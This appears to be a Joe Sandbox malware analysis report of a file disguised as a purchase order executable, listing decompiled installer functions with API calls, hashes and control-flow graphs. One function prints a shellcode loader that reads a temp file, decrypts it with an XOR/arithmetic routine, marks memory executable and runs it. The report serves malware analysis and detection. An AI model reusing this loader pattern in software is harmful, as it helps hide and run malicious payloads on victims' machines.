                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Read$PointerWrite
                      • String ID: 80A
                      • API String ID: 2113905535-195308239
                      • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                      • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 438 403191 431->438 439 403116-40311e 431->439 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 440 403193-403194 438->440 441 403120-403136 WriteFile 439->441 442 403152-403158 439->442 440->422 444 403138-40313c 441->444 445 40318d-40318f 441->445 442->438 443 40315a-40315c 442->443 443->438 446 40315e-403171 443->446 444->445 447 40313e-40314a 444->447 445->440 446->423 448 403177-403186 SetFilePointer 446->448 447->430 449 403150 447->449 448->416 449->446
                      C-Code - Quality: 94%
                      			E0040302C(intOrPtr _a4) {
                      				long _v4;
                      				void* __ecx;
                      				intOrPtr _t12;
                      				intOrPtr _t13;
                      				signed int _t14;
                      				void* _t16;
                      				void* _t17;
                      				long _t18;
                      				int _t21;
                      				intOrPtr _t22;
                      				intOrPtr _t34;
                      				long _t35;
                      				intOrPtr _t37;
                      				void* _t39;
                      				long _t40;
                      				intOrPtr _t53;
                      
                      				_t35 =  *0x41703c; // 0x3f276
                      				_t37 = _t35 -  *0x40afa8 + _a4;
                      				 *0x423eac = GetTickCount() + 0x1f4;
                      				if(_t37 <= 0) {
                      					L23:
                      					E00402BC5(1);
                      					return 0;
                      				}
                      				E004031DA( *0x41f04c);
                      				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                      				 *0x41f048 = _t37;
                      				 *0x417038 = 0;
                      				while(1) {
                      					_t12 =  *0x417040; // 0x3c4e3
                      					_t34 = 0x4000;
                      					_t13 = _t12 -  *0x41f04c;
                      					if(_t13 <= 0x4000) {
                      						_t34 = _t13;
                      					}
                      					_t14 = E004031A8(0x413038, _t34); // executed
                      					if(_t14 == 0) {
                      						break;
                      					}
                      					 *0x41f04c =  *0x41f04c + _t34;
                      					 *0x40afc8 = 0x413038;
                      					 *0x40afcc = _t34;
                      					L6:
                      					L6:
                      					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                      						_t22 =  *0x41f048; // 0x32abc
                      						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                      						E00402BC5(0);
                      					}
                      					 *0x40afd0 = 0x40b038;
                      					 *0x40afd4 = 0x8000; // executed
                      					_t16 = E00405E9D(0x40afb0); // executed
                      					if(_t16 < 0) {
                      						goto L21;
                      					}
                      					_t39 =  *0x40afd0; // 0x40ef76
                      					_t40 = _t39 - 0x40b038;
                      					if(_t40 == 0) {
                      						__eflags =  *0x40afcc; // 0x0
                      						if(__eflags != 0) {
                      							goto L21;
                      						}
                      						__eflags = _t34;
                      						if(_t34 == 0) {
                      							goto L21;
                      						}
                      						L17:
                      						_t18 =  *0x41703c; // 0x3f276
                      						if(_t18 -  *0x40afa8 + _a4 > 0) {
                      							continue;
                      						}
                      						SetFilePointer( *0x409014, _t18, 0, 0); // executed
                      						goto L23;
                      					}
                      					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                      					if(_t21 == 0 || _t40 != _v4) {
                      						_push(0xfffffffe);
                      						L22:
                      						_pop(_t17);
                      						return _t17;
                      					} else {
                      						 *0x40afa8 =  *0x40afa8 + _t40;
                      						_t53 =  *0x40afcc; // 0x0
                      						if(_t53 != 0) {
                      							goto L6;
                      						}
                      						goto L17;
                      					}
                      					L21:
                      					_push(0xfffffffd);
                      					goto L22;
                      				}
                      				return _t14 | 0xffffffff;
                      			}




















                      APIs
                      • GetTickCount.KERNEL32 ref: 00403041
                        • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                      • WriteFile.KERNELBASE(0040B038,0040EF76,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                      • SetFilePointer.KERNELBASE(0003F276,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Pointer$CountTickWrite
                      • String ID: 80A$v@
                      • API String ID: 2146148272-2572644541
                      • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                      • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 462 401f88-401f96 LoadLibraryExA 451->462 463 401f7b-401f86 GetModuleHandleA 451->463 454 402156-40215b call 401423 452->454 459 40287d-40288c 454->459 465 401f98-401fa6 GetProcAddress 462->465 466 402004-402006 462->466 463->462 463->465 467 401fe5-401fea call 404e23 465->467 468 401fa8-401fae 465->468 466->454 472 401fef-401ff2 467->472 470 401fb0-401fbc call 401423 468->470 471 401fc7-401fde call 72b210a0 468->471 470->472 478 401fbe-401fc5 470->478 475 401fe0-401fe3 471->475 472->459 476 401ff8-401fff FreeLibrary 472->476 475->472 476->459 478->472
                      C-Code - Quality: 57%
                      			E00401F51(void* __ebx, void* __eflags) {
                      				struct HINSTANCE__* _t18;
                      				struct HINSTANCE__* _t25;
                      				void* _t26;
                      				struct HINSTANCE__* _t29;
                      				CHAR* _t31;
                      				intOrPtr* _t32;
                      				void* _t33;
                      
                      				_t26 = __ebx;
                      				asm("sbb eax, 0x423f58");
                      				 *(_t33 - 4) = 1;
                      				if(__eflags < 0) {
                      					_push(0xffffffe7);
                      					L14:
                      					E00401423();
                      					L15:
                      					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                      					return 0;
                      				}
                      				_t31 = E004029E8(0xfffffff0);
                      				 *(_t33 + 8) = E004029E8(1);
                      				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                      					L3:
                      					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                      					_t29 = _t18;
                      					if(_t29 == _t26) {
                      						_push(0xfffffff6);
                      						goto L14;
                      					}
                      					L4:
                      					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                      					if(_t32 == _t26) {
                      						E00404E23(0xfffffff7,  *(_t33 + 8));
                      					} else {
                      						 *(_t33 - 4) = _t26;
                      						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                      							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                      						} else {
                      							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                      							if( *_t32() != 0) {
                      								 *(_t33 - 4) = 1;
                      							}
                      						}
                      					}
                      					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                      						FreeLibrary(_t29);
                      					}
                      					goto L15;
                      				}
                      				_t25 = GetModuleHandleA(_t31); // executed
                      				_t29 = _t25;
                      				if(_t29 != __ebx) {
                      					goto L4;
                      				}
                      				goto L3;
                      			}











                      APIs
                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                      • String ID: ?B
                      • API String ID: 2987980305-117478770
                      • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                      • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 85%
                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                      				struct _SECURITY_ATTRIBUTES** _t10;
                      				int _t19;
                      				struct _SECURITY_ATTRIBUTES* _t20;
                      				signed char _t22;
                      				struct _SECURITY_ATTRIBUTES* _t23;
                      				CHAR* _t25;
                      				struct _SECURITY_ATTRIBUTES** _t29;
                      				void* _t30;
                      
                      				_t23 = __ebx;
                      				_t25 = E004029E8(0xfffffff0);
                      				_t10 = E0040560C(_t25);
                      				_t27 = _t10;
                      				if(_t10 != __ebx) {
                      					do {
                      						_t29 = E004055A3(_t27, 0x5c);
                      						 *_t29 = _t23;
                      						 *((char*)(_t30 + 0xb)) =  *_t29;
                      						_t19 = CreateDirectoryA(_t25, _t23); // executed
                      						if(_t19 == 0) {
                      							if(GetLastError() != 0xb7) {
                      								L4:
                      								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                      							} else {
                      								_t22 = GetFileAttributesA(_t25); // executed
                      								if((_t22 & 0x00000010) == 0) {
                      									goto L4;
                      								}
                      							}
                      						}
                      						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                      						 *_t29 = _t20;
                      						_t27 =  &(_t29[0]);
                      					} while (_t20 != _t23);
                      				}
                      				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                      					_push(0xfffffff5);
                      					E00401423();
                      				} else {
                      					E00401423(0xffffffe6);
                      					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                      					SetCurrentDirectoryA(_t25); // executed
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                      				return 0;
                      			}












                      APIs
                        • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 0040561A
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 3751793516-47812868
                      • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                      • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                      				signed int _t11;
                      				int _t14;
                      				signed int _t16;
                      				void* _t19;
                      				CHAR* _t20;
                      
                      				_t20 = _a4;
                      				_t19 = 0x64;
                      				while(1) {
                      					_t19 = _t19 - 1;
                      					_a4 = 0x61736e;
                      					_t11 = GetTickCount();
                      					_t16 = 0x1a;
                      					_a6 = _a6 + _t11 % _t16;
                      					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                      					if(_t14 != 0) {
                      						break;
                      					}
                      					if(_t19 != 0) {
                      						continue;
                      					}
                      					 *_t20 =  *_t20 & 0x00000000;
                      					return _t14;
                      				}
                      				return _t20;
                      			}









                      APIs
                      • GetTickCount.KERNEL32 ref: 0040579E
                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CountFileNameTempTick
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                      • API String ID: 1716503409-3227440334
                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 76%
                      			E72B210A0(void* __ecx, void* __eflags) {
                      				short _v6;
                      				short _v8;
                      				short _v10;
                      				short _v12;
                      				short _v14;
                      				short _v16;
                      				short _v18;
                      				short _v20;
                      				short _v22;
                      				char _v24;
                      				void* _v28;
                      				long _v32;
                      				long _v36;
                      				short _v1076;
                      				void _v6048;
                      				void* _t37;
                      				intOrPtr _t40;
                      				struct _OVERLAPPED* _t63;
                      				void* _t72;
                      
                      				E72B21000(0x179c, __ecx);
                      				_v24 = 0x75;
                      				_v22 = 0x72;
                      				_v20 = 0x70;
                      				_v18 = 0x77;
                      				_v16 = 0x76;
                      				_v14 = 0x71;
                      				_v12 = 0x61;
                      				_v10 = 0x6e;
                      				_v8 = 0x65;
                      				_v6 = 0;
                      				GetTempPathW(0x103,  &_v1076);
                      				E72B21030( &_v1076,  &_v24);
                      				VirtualProtect( &_v6048, 0x136c, 0x40,  &_v32); // executed
                      				_t37 = CreateFileW( &_v1076, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                      				_v28 = _t37;
                      				ReadFile(_v28,  &_v6048, 0x136c,  &_v36, 0); // executed
                      				_t63 = 0;
                      				while(1) {
                      					_t40 =  *((intOrPtr*)(_t72 + _t63 - 0x179c));
                      					if(_t63 == 0x136c) {
                      						break;
                      					}
                      					 *((char*)(_t72 + _t63 - 0x179c)) = ((_t40 + 0x000000bc - 0x77 + 0x00000035 ^ 0x00000026) + 0x18 - 0x00000001 ^ 0xd) + 1;
                      					_t63 =  &(_t63->Internal);
                      				}
                      				_v6048();
                      				return 0;
                      			}























                      APIs
                      • GetTempPathW.KERNEL32(00000103,?), ref: 72B21110
                      • VirtualProtect.KERNELBASE(?,0000136C,00000040,?), ref: 72B2113B
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72B2115A
                      • ReadFile.KERNELBASE(?,?,0000136C,?,00000000), ref: 72B21179
                      Memory Dump Source
                      • Source File: 00000000.00000002.669744358.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
                      • Associated: 00000000.00000002.669677900.0000000072B20000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.669787017.0000000072B22000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72b20000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$CreatePathProtectReadTempVirtual
                      • String ID:
                      • API String ID: 205760209-0
                      • Opcode ID: 8b22f4feae5e9199703f48bfffb923399f9d5aa40d135a9bc99108c85cd04cb8
                      • Instruction ID: 2490afb1df682ba7bedcfc9e46f100d7db75bd107592a289f7c1b85abc8470e8
                      • Opcode Fuzzy Hash: 8b22f4feae5e9199703f48bfffb923399f9d5aa40d135a9bc99108c85cd04cb8
                      • Instruction Fuzzy Hash: 2431BF75924308ABEB10DBA4CC15BEE7375EF54700F10A468E20DE76D0E6B96B05CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E004031F1(void* __eflags) {
                      				void* _t2;
                      				void* _t5;
                      				CHAR* _t6;
                      
                      				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                      				E00405CE3(_t6);
                      				_t2 = E004055E5(_t6);
                      				if(_t2 != 0) {
                      					E00405578(_t6);
                      					CreateDirectoryA(_t6, 0); // executed
                      					_t5 = E0040578B("1033", _t6); // executed
                      					return _t5;
                      				} else {
                      					return _t2;
                      				}
                      			}







                      APIs
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Char$Next$CreateDirectoryPrev
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 4115351271-517883005
                      • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                      • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 99%
                      			E00406481() {
                      				signed int _t530;
                      				void _t537;
                      				signed int _t538;
                      				signed int _t539;
                      				unsigned short _t569;
                      				signed int _t579;
                      				signed int _t607;
                      				void* _t627;
                      				signed int _t628;
                      				signed int _t635;
                      				signed int* _t643;
                      				void* _t644;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					_t530 =  *(_t644 - 0x30);
                      					if(_t530 >= 4) {
                      					}
                      					 *(_t644 - 0x40) = 6;
                      					 *(_t644 - 0x7c) = 0x19;
                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                      					while(1) {
                      						L145:
                      						 *(_t644 - 0x50) = 1;
                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      						while(1) {
                      							L149:
                      							if( *(_t644 - 0x48) <= 0) {
                      								goto L155;
                      							}
                      							L150:
                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                      							 *(_t644 - 0x54) = _t643;
                      							_t569 =  *_t643;
                      							_t635 = _t569 & 0x0000ffff;
                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                      							if( *(_t644 - 0xc) >= _t607) {
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                      								_t628 = _t627 + 1;
                      								 *_t643 = _t569 - (_t569 >> 5);
                      								 *(_t644 - 0x50) = _t628;
                      							} else {
                      								 *(_t644 - 0x10) = _t607;
                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                      							}
                      							if( *(_t644 - 0x10) >= 0x1000000) {
                      								L148:
                      								_t487 = _t644 - 0x48;
                      								 *_t487 =  *(_t644 - 0x48) - 1;
                      								L149:
                      								if( *(_t644 - 0x48) <= 0) {
                      									goto L155;
                      								}
                      								goto L150;
                      							} else {
                      								L154:
                      								L146:
                      								if( *(_t644 - 0x6c) == 0) {
                      									L169:
                      									 *(_t644 - 0x88) = 0x18;
                      									L170:
                      									_t579 = 0x22;
                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                      									_t539 = 0;
                      									L172:
                      									return _t539;
                      								}
                      								L147:
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      								_t484 = _t644 - 0x70;
                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      								goto L148;
                      							}
                      							L155:
                      							_t537 =  *(_t644 - 0x7c);
                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                      							while(1) {
                      								L140:
                      								 *(_t644 - 0x88) = _t537;
                      								while(1) {
                      									L1:
                      									_t538 =  *(_t644 - 0x88);
                      									if(_t538 > 0x1c) {
                      										break;
                      									}
                      									L2:
                      									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                      										case 0:
                      											L3:
                      											if( *(_t644 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											L4:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t538 =  *( *(_t644 - 0x70));
                      											if(_t538 > 0xe1) {
                      												goto L171;
                      											}
                      											L5:
                      											_t542 = _t538 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t581);
                      											_push(9);
                      											_pop(_t582);
                      											_t638 = _t542 / _t581;
                      											_t544 = _t542 % _t581 & 0x000000ff;
                      											asm("cdq");
                      											_t633 = _t544 % _t582 & 0x000000ff;
                      											 *(_t644 - 0x3c) = _t633;
                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                      												L10:
                      												if(_t641 == 0) {
                      													L12:
                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t641 = _t641 - 1;
                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                      												} while (_t641 != 0);
                      												goto L12;
                      											}
                      											L6:
                      											if( *(_t644 - 4) != 0) {
                      												GlobalFree( *(_t644 - 4));
                      											}
                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
